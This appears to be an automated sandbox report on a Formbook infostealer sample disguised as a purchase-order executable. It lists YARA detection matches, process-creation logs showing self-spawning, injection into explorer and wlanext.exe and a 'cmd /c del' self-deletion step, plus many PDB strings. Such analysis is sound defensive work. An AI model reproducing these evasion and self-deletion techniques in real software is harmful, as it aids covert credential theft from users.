          Source: PO45937008ADENGY.exe, 00000000.00000002.712443613.0000000003DF9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPeBraba.dll6 vs PO45937008ADENGY.exe
          Source: PO45937008ADENGY.exe, 00000000.00000002.720152538.00000000052B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs PO45937008ADENGY.exe
          Source: PO45937008ADENGY.exe, 00000007.00000002.660956521.00000000001FE000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDimbono.exe0 vs PO45937008ADENGY.exe
          Source: PO45937008ADENGY.exe, 00000008.00000000.661485381.000000000004E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDimbono.exe0 vs PO45937008ADENGY.exe
          Source: PO45937008ADENGY.exeBinary or memory string: OriginalFilename vs PO45937008ADENGY.exe
          Source: PO45937008ADENGY.exe, 00000009.00000000.662706033.00000000008DE000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDimbono.exe0 vs PO45937008ADENGY.exe
          Source: PO45937008ADENGY.exe, 00000009.00000002.716188410.00000000015AF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO45937008ADENGY.exe
          Source: PO45937008ADENGY.exe, 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameMFRo XBk.exe2 vs PO45937008ADENGY.exe
          Source: PO45937008ADENGY.exe, 00000009.00000002.716529184.0000000002F92000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamewlanext.exej% vs PO45937008ADENGY.exe
          Source: PO45937008ADENGY.exeBinary or memory string: OriginalFilenameDimbono.exe0 vs PO45937008ADENGY.exe
          Source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbJ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@17/5@16/13
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeFile created: C:\Users\user\IAHRsWbfqoMJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7024
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4676:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1284:120:WilError_01
          Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER15F6.tmpJump to behavior
          Source: PO45937008ADENGY.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PO45937008ADENGY.exeVirustotal: Detection: 27%
          Source: PO45937008ADENGY.exeReversingLabs: Detection: 25%
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeFile read: C:\Users\user\Desktop\PO45937008ADENGY.exe:Zone.IdentifierJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\PO45937008ADENGY.exe 'C:\Users\user\Desktop\PO45937008ADENGY.exe'
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 2152
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO45937008ADENGY.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeProcess created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO45937008ADENGY.exe'
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: PO45937008ADENGY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: PO45937008ADENGY.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
          Source: Binary string: onfiguration.ni.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: System.ni.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
          Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000D.00000003.670335958.0000000004C32000.00000004.00000001.sdmp
          Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: onfiguration.ni.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO45937008ADENGY.exe, WerFault.exe, 0000000D.00000003.670367883.0000000000C45000.00000004.00000001.sdmp, wlanext.exe
          Source: Binary string: crypt32.pdb_ source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: winnsi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: clr.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: .ni.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: PO45937008ADENGY.PDB source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
          Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: schannel.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000D.00000003.671537664.0000000000C57000.00000004.00000001.sdmp
          Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: WLDP.pdb/ source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
          Source: Binary string: System.Windows.Forms.pdb< source: WER15F6.tmp.dmp.13.dr
          Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: rasapi32.pdb| source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: System.Core.pdb( source: WER15F6.tmp.dmp.13.dr
          Source: Binary string: CLBCatQ.pdb= source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000D.00000003.688645391.0000000005190000.00000004.00000040.sdmp
          Source: Binary string: iphlpapi.pdbu source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbn source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
          Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: mscorsecimpl.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: wmswsock.pdb! source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: shell32.pdbn source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000C.00000000.688286322.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdbP source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
          Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: nsi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO45937008ADENGY.exe, 00000009.00000003.664621972.0000000001160000.00000004.00000001.sdmp, wlanext.exe, 00000011.00000002.915414593.0000000003A1F000.00000040.00000001.sdmp
          Source: Binary string: ncrypt.pdbk source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.ni.pdbRSDS source: WER15F6.tmp.dmp.13.dr
          Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: ole32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbps; source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
          Source: Binary string: imagehlp.pdby source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: ucrtbase.pdb_ source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: propsys.pdbm source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: comctl32v582.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: combase.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: iVisualBasic.pdb source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
          Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000D.00000003.670642715.0000000000C51000.00000004.00000001.sdmp
          Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER15F6.tmp.dmp.13.dr
          Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: secur32.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: rasman.pdbv source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000D.00000003.688645391.0000000005190000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.ni.pdbRSDS source: WER15F6.tmp.dmp.13.dr
          Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: ml.ni.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: .pdb= source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: System.Core.ni.pdbRSDSD source: WER15F6.tmp.dmp.13.dr
          Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: msasn1.pdb7 source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: rsaenh.pdbz source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: ml.ni.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: Kernel.Appcore.pdb! source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: dhcpcsvc6.pdbQ source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: wlanext.pdb source: PO45937008ADENGY.exe, 00000009.00000002.716498017.0000000002F80000.00000040.00000001.sdmp
          Source: Binary string: t.VisualBasic.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: wUxTheme.pdbs source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: shcore.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: .pdb+ source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
          Source: Binary string: cldapi.pdbC source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: System.Core.ni.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
          Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: shell32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: winhttp.pdb; source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: edputil.pdbI source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.VisualBasic.pdb\F1 source: WER15F6.tmp.dmp.13.dr
          Source: Binary string: iLC:\Windows\Microsoft.VisualBasic.pdb source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
          Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000D.00000003.688216819.00000000051AD000.00000004.00000040.sdmp
          Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: imagehlp.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000000D.00000003.688216819.00000000051AD000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
